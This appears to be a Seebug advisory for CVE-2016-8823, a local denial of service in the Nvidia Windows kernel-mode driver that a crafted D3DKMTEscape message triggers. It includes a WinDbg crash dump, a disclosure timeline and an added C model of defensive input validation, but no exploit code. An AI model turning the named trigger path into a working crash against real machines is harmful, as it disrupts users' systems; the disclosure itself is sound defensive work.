Nvidia Windows Kernel Mode Driver Denial Of Service (CVE-2016-8823)

2017-10-10T00:00:00
ID SSV:96634
Type seebug
Reporter Root
Modified 2017-10-10T00:00:00

Description

Summary

A local denial of service vulnerability exists in the communication functionality of the Nvidia Windows Kernel Mode Driver. A specially crafted message can trigger this vulnerability, resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.

Tested Versions

(Requires physical machine)

  • Nvidia Windows Kernel Mode Driver, 372.70 (21.21.13.7270)
  • Nvidia Windows Kernel Mode Driver, 372.90 (21.21.13.7290)

Product URLs

http://nvidia.com

CVSSv3 Score

5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Details

A local denial of service vulnerability exists in the communication functionality of the Nvidia Windows Kernel Mode Driver. A specially crafted D3DKMTEscape message can trigger this vulnerability, resulting in a machine crash (BSOD). An attacker can send a specific message to trigger this vulnerability.

This bug happens because the Nvidia driver calls the ZwSetValueKey API with an invalid argument: the crash dump below shows the kernel faulting in nt!memcpy, reached from nt!NtSetValueKey via nt!CmpSetValueDataNew, while it copies the value data that nvlddmkm passed in.
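As an added illustration (not NVIDIA's code and not the fix they shipped), the following user-mode C model shows the check an escape handler needs before anything derived from the caller's message reaches ZwSetValueKey: the data range is validated against the bytes actually supplied, with overflow-safe arithmetic, and only a copy in a buffer the handler owns goes on to the registry write. The header layout, field names and the 4096-byte cap are assumptions made for this model; the real nvlddmkm message format is not described on this page.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_REG_VALUE_BYTES 4096u  /* policy cap for one value, chosen for this model */
/* Hypothetical escape header; the value data follows it inside the same message. */
typedef struct {
    uint32_t data_offset;  /* offset of the value data from the start of the message */
    uint32_t data_length;  /* length of the value data in bytes */
} escape_hdr_t;

typedef enum { ESC_OK = 0, ESC_TOO_SHORT, ESC_TOO_LARGE, ESC_BAD_RANGE } esc_status_t;

/* Accepts only a data range that lies entirely inside the msg_size bytes the
 * caller really supplied; each comparison is overflow-safe (no offset+length sum). */
esc_status_t validate_escape(const uint8_t *msg, size_t msg_size, const uint8_t **data, size_t *len)
{
    escape_hdr_t hdr;
    if (msg == NULL || msg_size < sizeof hdr) return ESC_TOO_SHORT;
    memcpy(&hdr, msg, sizeof hdr);             /* work on our own copy of the header */
    if (hdr.data_length > MAX_REG_VALUE_BYTES) return ESC_TOO_LARGE;
    if (hdr.data_offset < sizeof hdr || hdr.data_offset > msg_size ||
        hdr.data_length > msg_size - hdr.data_offset)
        return ESC_BAD_RANGE;
    *data = msg + hdr.data_offset;
    *len = hdr.data_length;
    return ESC_OK;
}

/* Copies validated data into a buffer the handler owns; in a real driver that owned
 * buffer, never a pointer taken from the message, is what ZwSetValueKey would get. */
size_t stage_value_for_registry(const uint8_t *msg, size_t msg_size, uint8_t *owned, size_t owned_size)
{
    const uint8_t *data; size_t len;
    if (validate_escape(msg, msg_size, &data, &len) != ESC_OK || len > owned_size)
        return 0;                              /* rejected: nothing reaches the registry */
    memcpy(owned, data, len);
    return len;                                /* bytes staged for the registry write */
}

/* Builds a msg_size-byte message with the given header fields and runs it through
 * the handler, so the reject paths can be exercised without a kernel. */
size_t run_case(uint32_t data_offset, uint32_t data_length, size_t msg_size)
{
    uint8_t msg[64] = {0}, owned[MAX_REG_VALUE_BYTES];
    escape_hdr_t hdr = { data_offset, data_length };
    if (msg_size > sizeof msg) return 0;
    memcpy(msg, &hdr, sizeof hdr);
    return stage_value_for_registry(msg, msg_size, owned, sizeof owned);
}
```

A length that claims more bytes than the message carries, an offset past the end of the message, or a length large enough to wrap a naive offset+length sum are all rejected before any copy happens.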

Crash Information

```
0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffffd00026a46000, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff801b0bcfc20, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 0000000000000000, (reserved)

Debugging Details:

READ_ADDRESS:  ffffd00026a46000

FAULTING_IP:
nt!memcpy+a0
fffff801`b0bcfc20 f30f6f040a      movdqu  xmm0,xmmword ptr [rdx+rcx]

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  WIN8_DRIVER_FAULT

BUGCHECK_STR:  AV

PROCESS_NAME:  intel1.exe

CURRENT_IRQL:  0

ANALYSIS_VERSION: 6.3.9600.17298 (debuggers(dbg).141024-1500) amd64fre

TRAP_FRAME:  ffffd00026a44670 -- (.trap 0xffffd00026a44670)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc001f8688670
rdx=00000ffe2e3bd988 rsi=0000000000000000 rdi=0000000000000000
rip=fffff801b0bcfc20 rsp=ffffd00026a44808 rbp=00000000000054e1
 r8=000000000000000c  r9=00000000000001cc r10=ffffe00152d2ae68
r11=ffffc001f8688024 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
nt!memcpy+0xa0:
fffff801b0bcfc20 f30f6f040a      movdqu  xmm0,xmmword ptr [rdx+rcx] ds:ffffd00026a45ff8=????????????????????????????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from fffff801b0bde42c to fffff801b0bc33a0

STACK_TEXT:
ffffd00026a44408 fffff801b0bde42c : 0000000000000050 ffffd00026a46000 0000000000000000 ffffd00026a44670 : nt!KeBugCheckEx
ffffd00026a44410 fffff801b0af2d09 : 0000000000000000 ffffe0015c91b080 ffffd00026a44670 0000000000000000 : nt! ?? ::FNODOBFM::`string'+0xab6c
ffffd00026a444b0 fffff801b0bcd62f : 0000000000000000 ffffc001f008dfc4 0000000000000000 0000000000000000 : nt!MmAccessFault+0x769
ffffd00026a44670 fffff801b0bcfc20 : fffff801b0f26473 ffffe0015d517301 ffffc00100000006 ffffc001f008dfc4 : nt!KiPageFault+0x12f
ffffd00026a44808 fffff801b0f26473 : ffffe0015d517301 ffffc00100000006 ffffc001f008dfc4 ffffd00026a44860 : nt!memcpy+0xa0
ffffd00026a44810 fffff801b0fbcd18 : ffffc001f8688024 0000000000000000 00000000001e8480 ffffc001ee828000 : nt!CmpSetValueDataNew+0x157
ffffd00026a44860 fffff801b0f0f588 : 01d21329ff575fe0 ffffd00026a44991 ffffc001f170fa70 0000002500000003 : nt! ?? ::NNGAKEGL::`string'+0x27928
ffffd00026a448d0 fffff801b0e3a977 : ffffc001f7837b50 ffffd00026a44a40 ffffc00100000003 ffffd00026a459ac : nt!CmSetValueKey+0x784
ffffd00026a449e0 fffff801b0bcebb3 : ffffc001ee8763a0 ffffd00026a44c40 0000000000000000 fffff801b0e9bc1e : nt!NtSetValueKey+0x55f
ffffd00026a44bb0 fffff801b0bc7020 : fffff8014175a51a 00000000000054e1 ffffd00026a44e31 ffffd00026a459ac : nt!KiSystemServiceCopyEnd+0x13
ffffd00026a44db8 fffff8014175a51a : 00000000000054e1 ffffd00026a44e31 ffffd00026a459ac 00000000000054e1 : nt!KiServiceLinkage
ffffd00026a44dc0 fffff8014175a051 : 00000000000054e1 ffffd00026a459ac 00000000000054e1 00000000000054e1 : nvlddmkm+0xb751a
ffffd00026a44e80 fffff801417944e7 : fffff80141759fc0 ffffd00026a45870 ffffd00026a450b0 0000000000000140 : nvlddmkm+0xb7051
ffffd00026a44f20 fffff80141763faf : 0000000000000000 fffff801b0dc97e0 ffffe00152d2a080 ffffc001ee803000 : nvlddmkm+0xf14e7
ffffd00026a44f70 fffff80141f44769 : ffffd00026a45508 ffffd00026a450b0 ffffd00026a45870 0000000000000000 : nvlddmkm+0xc0faf
ffffd00026a44fb0 fffff80141f39e24 : ffffd00026a45448 ffffd00026a45658 ffffe0015d517080 fffff801b0bcebb3 : nvlddmkm!nvDumpConfig+0x1253a1
ffffd00026a45410 fffff80141f44136 : ffffe0015665a000 ffffd00026a45519 0000000000000000 ffffe00156a96000 : nvlddmkm!nvDumpConfig+0x11aa5c
ffffd00026a45450 fffff80141efb43d : ffffd00026a45780 ffffd00026a455e9 ffffd00026a45780 ffffe0015665a000 : nvlddmkm!nvDumpConfig+0x124d6e
ffffd00026a45580 fffff801413604f8 : 0000000000000002 ffffe0015c825220 000000004e562a2a 0000000001000003 : nvlddmkm!nvDumpConfig+0xdc075
ffffd00026a45650 fffff801413c5b4e : 0000000000000000 ffffd00026a45b80 ffffd00026a45ad0 fffff80141463b98 : dxgkrnl!DXGADAPTER::DdiEscape+0x48
ffffd00026a45680 fffff960002d41d3 : ffffe0015a294010 ffffe0015d517080 000000007f82f000 ffffe0015a294010 : dxgkrnl!DxgkEscape+0x802
ffffd00026a45ab0 fffff801b0bcebb3 : ffffe0015d517080 000000007f82d000 000000000013fdb0 0000000000000000 : win32k!NtGdiDdDDIEscape+0x53
ffffd00026a45b00 00000000773d74aa : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : nt!KiSystemServiceCopyEnd+0x13
000000000013dfd8 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : 0x773d74aa

STACK_COMMAND:  kb

FOLLOWUP_IP:
nvlddmkm+b751a
fffff801`4175a51a 85c0            test    eax,eax

SYMBOL_STACK_INDEX:  b

SYMBOL_NAME:  nvlddmkm+b751a

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: nvlddmkm

IMAGE_NAME:  nvlddmkm.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  57bf5593

FAILURE_BUCKET_ID:  AV_nvlddmkm+b751a

BUCKET_ID:  AV_nvlddmkm+b751a

ANALYSIS_SOURCE:  KM

FAILURE_ID_HASH_STRING:  km:av_nvlddmkm+b751a

FAILURE_ID_HASH:  {4bb56d14-bad0-e413-eed6-722441b0442f}

Followup: MachineOwner
```

Timeline

  • 2016-09-30 - Initial Discovery
  • 2016-10-17 - Vendor Notification
  • 2016-12-14 - Public Disclosure